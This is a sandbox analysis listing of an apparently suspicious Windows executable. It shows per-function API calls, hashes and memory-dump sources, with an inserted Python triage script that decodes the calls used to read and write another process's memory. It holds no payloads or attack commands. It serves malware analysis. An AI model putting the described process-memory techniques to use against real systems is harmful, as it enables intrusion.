                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                    • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                    • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                    • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                    • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                    • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                    • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 708495834-557222456
                                                    • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                    • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                    • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                    • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
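The function entry that follows is the one in this listing worth a second look: its direct calls are three SendMessageW calls, but its subcalls open a process handle, allocate in that process, and write and read its memory (OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory). The script below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: a small parser for the listing's "APIs" lines that extracts each call's module, arguments, call site and subcall origin, then decodes the constants the entry passes. The sample input is that entry's APIs block, copied as a constructed string; the constant names come from the Windows SDK headers (PROCESS_* from winnt.h, TVM_* from commctrl.h, where 0x1104 = TV_FIRST + 4 and 0x1111 = TV_FIRST + 17); the names ApiCall, parse_apis and triage are this example's own. The conclusion it prints, that these lines show foreign-memory read/write but no thread started in the target, rests only on the calls visible here (no CreateRemoteThread appears among them).

```python
"""Parser for the "APIs" lines of a Joe Sandbox IDA-plugin function entry.

Added example, not part of the report or of the analysed sample.  The names
ApiCall, parse_apis and triage are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: the APIs block of one function entry, in the listing's
# own format (direct calls plus "Part of subcall function" lines).
SAMPLE = """\
APIs
  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
Strings
"""

# One API line: optional subcall prefix, Name.MODULE, optional "(args)", call-site address.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple             # argument tokens as printed; "?" where the analyser could not resolve one
    ref: str                # call-site address
    subcall: Optional[str]  # callee address when the API is reached through a subcall


def parse_apis(text: str) -> list:
    """Return every API call listed in text, in listing order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
    return calls


# Constant names from the Windows SDK headers (winnt.h, commctrl.h).
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
                  0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME"}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_FLAGS = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# Both tree-view messages take a pointer in lParam that must be valid inside the
# window's owning process, which is why a caller in another process has to
# allocate and write there before sending them.
TREEVIEW_MSG = {0x1100 + 4: "TVM_GETITEMRECT", 0x1100 + 17: "TVM_HITTEST"}
CROSS_PROCESS = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}


def decode_flags(value: int, table: dict) -> list:
    """Split a bitmask into the names in table (ascending bit order); unknown bits stay hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)  # keys are distinct single bits, so their sum is their OR
    if unknown:
        names.append(hex(unknown))
    return names


def _int(token: str) -> Optional[int]:
    return None if token == "?" else int(token, 16)


def triage(calls: list) -> dict:
    """Summarise what one function entry does with another process's memory."""
    names = {c.name for c in calls}
    findings = {
        # Every primitive needed to read and write a foreign address space is present.
        "cross_process_memory": CROSS_PROCESS <= names,
        # No thread is started in the target on these lines: memory is used, not executed.
        "remote_thread": "CreateRemoteThread" in names,
        "messages": [],
    }
    for c in calls:
        if c.name == "OpenProcess" and c.args and _int(c.args[0]) is not None:
            findings["process_access"] = decode_flags(_int(c.args[0]), PROCESS_ACCESS)
        elif c.name == "VirtualAllocEx" and len(c.args) == 5 and "?" not in c.args[3:]:
            findings["alloc_type"] = decode_flags(_int(c.args[3]), MEM_FLAGS)
            findings["protect"] = decode_flags(_int(c.args[4]), PAGE_FLAGS)
        elif c.name == "SendMessageW" and len(c.args) > 1 and _int(c.args[1]) is not None:
            msg = _int(c.args[1])
            findings["messages"].append(TREEVIEW_MSG.get(msg, hex(msg)))
    findings["messages"] = sorted(set(findings["messages"]))
    return findings


if __name__ == "__main__":
    for call in parse_apis(SAMPLE):
        origin = f"via {call.subcall}" if call.subcall else "direct      "
        print(f"{call.ref} {origin} {call.name}.{call.module}{call.args}")
    print(triage(parse_apis(SAMPLE)))
```

Decoded, the entry's OpenProcess access mask 0x438 is PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, and the VirtualAllocEx arguments 0x1000, 0x4 are MEM_COMMIT with PAGE_READWRITE: a writable, non-executable buffer in the process that owns the window, sized for the structures the two tree-view messages expect. The same parser runs unchanged over any other entry in this listing, and the triage dictionary is the kind of per-function summary that is easier to grep than the listing itself.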
                                                    APIs
                                                      • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                      • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                      • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                      • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                      • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \$]$h
                                                    APIs
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • CloseHandle.KERNEL32(?), ref: 00457E09
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                    • String ID: <$@
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                    • String ID:
                                                    APIs
                                                    • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                    • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                    • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem
                                                    • String ID: 0
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                    • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: AU3_GetPluginDetails
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow
                                                    • String ID: msctls_updown32
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: $<
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                    • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                    • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                    • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                    • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                    • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                    • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: \VH
                                                    • API String ID: 2507767853-234962358
                                                    • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                    • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                    • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                    • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: \VH
                                                    • API String ID: 2507767853-234962358
                                                    • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                    • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                    • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                    • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                    • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                    • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                    • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                    • String ID: crts
                                                    • API String ID: 943502515-3724388283
                                                    • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                    • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                    • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                    • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                    • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                    • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
